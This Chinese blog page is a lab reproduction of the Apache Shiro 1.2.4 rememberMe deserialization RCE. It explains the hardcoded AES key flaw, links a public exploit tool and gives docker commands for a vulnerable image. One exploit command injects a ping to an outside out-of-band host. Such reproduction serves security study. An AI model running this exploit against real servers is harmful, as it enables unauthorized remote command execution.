2. 程式人生 > 實用技巧 >Apache Shiro<=1.2.4反序列化RCE漏洞

Apache Shiro<=1.2.4反序列化RCE漏洞

阿新 發佈:2020-10-10

版本:Apache Shiro<=1.2.4

介紹:Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。

漏洞原因:因為shiro對cookie裡的rememberme欄位進行了反序列化,所以如果知道了shiro的編碼方式,然後將惡意命令用它的編碼方式進行編碼並放在http頭的cookie裡,在shiro對提交的cookie的rememberme欄位進行反序列化時,也就執行了插入的命令,最終造成了命令執行

shiro預設使用了CookieRememberMeManager,其處理cookie的流程是:得到rememberMe的cookie值-->Base64解碼-->AES解密-->反序列化

然而AES的金鑰是硬編碼的,就導致了攻擊者可以構造惡意資料造成反序列化的RCE漏洞。

漏洞驗證:

漏洞利用:

利用工具:https://github.com/sv3nbeast/ShiroScan

如果沒有該映象的話可以去在docker裡面拉取環境docker pull medicean/vulapps:s_shiro_1,已經有人準備好了的

1、sudo docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

2、python shiro_rce.py http://192.168.1.143 "ping 0wtpsg.ceye.io"

參考文章:https://www.t00ls.net/viewthread.php?tid=52744&highlight=shiro

相關推薦

Apache Shiro=1.2.4序列RCE漏洞

版本:Apache Shiro<=1.2.4 介紹:Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。

漏洞復現】Shiro<=1.2.4序列漏洞

0x01 概述 Shiro簡介 Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。使用Shiro的易於理解的API,您可以快速、輕鬆地獲得任何應用程式,從最小的移動應用程式到最大的網路和企業

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)復現

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

漏洞復現 - Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

Fastjson <= 1.2.47 序列漏洞復現

0x01 前言 Fastjson 是一個 Java 語言編寫的高效能功能完善的 JSON 庫,可以將 Java 物件轉換為 JSON 格式,也可以將 JSON 字串轉換為 Java 物件,在中國和美國使用較為廣泛。

Fastjson 1.2.24 序列漏洞研究

一、概述   fastjson自2017年爆出序列漏洞以來,漏洞就一直停不下來。本次主要研究2017年第一次爆出序列漏洞

Apereo CAS 4.1 序列 RCE 漏洞

0x01漏洞概述 ​Apereo CAS 是一個企業單點登入系統。CAS 嘗試通過 Apache Commons Collections 庫序列化物件時存在問題,該漏洞存在 RCE 漏洞

【高危安全通告】fastjson≤1.2.80序列漏洞

近日Fastjson Develop Team釋出安全公告,Fastjson≤1.2.80版本中存在序列漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大。

【JNPF修改通告】fastjson≤1.2.80序列漏洞

近日Fastjson Develop Team 發現 fastjson 1.2.80及以下存在新的風險,存在序列漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大,請大家關注。

漏洞除錯】fastjson1.2.24序列漏洞復現-mac版

1 漏洞原理 Fastjson支援在json資料中使用@type屬性指定該json資料被序列為什麼型別的物件。說明在序列物件時,會執行javabean的setter方法為其屬性賦值。

Shiro1.2.4RememberMe序列漏洞

Shiro1.2.4RememberMe序列漏洞 針對Shiro版本1.2.4以下有效,Shiro是一個java框架 漏洞原理

ThinkPHP3.2.3序列鏈子分析

 前言  目前官方已經不再維護ThinkPHP3.2.3,本文僅對ThinkPHP3.2.3序列鏈子進行復現,如有紕漏,還望指正。

CVE-2020-15148 Yii框架序列RCE利用鏈 exp

簡介 如果在使用yii框架,並且在使用者可以控制的輸入處呼叫了unserialize()並允許特殊字元的情況下,會受到序列遠端命令命令執行漏洞攻擊。

Yii框架序列RCE利用鏈分析

影響範圍 Yii2 < 2.0.38 測試版本 yii-basic-app-2.0.37.tgz 原理我這邊看了一下,是能夠看懂,但是我是菜雞,序列的鏈我構造不出來=。=

Apache Shiro序列遠端程式碼執行復現

最近也是看shiro漏洞比較多,所以自己也在本地復現了一下,拿出來與大家一起分享

Apache Shiro序列漏洞復現(CVE-2016-4437)

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro Java 序列漏洞解決修復記錄

收到了阿里的警告 阿里漏洞掃描系統 解決辦法 借鑑了 https://blog.csdn.net/Fly_hps/article/details/106112692 下載windows 掃描工具 https://github.com/feihong-cs/ShiroExploit/releases

Java安全之序列(四)--fastjson < 1.2.41-1.2.45

  fastjson在1.2.24漏洞之後,官方的修復方案是引入checkAutotype安全機制,通過黑白名單來實現防禦,並且在預設情況下也不支援@type來指定隨意物件進行例項了。下圖是1.2.25版本。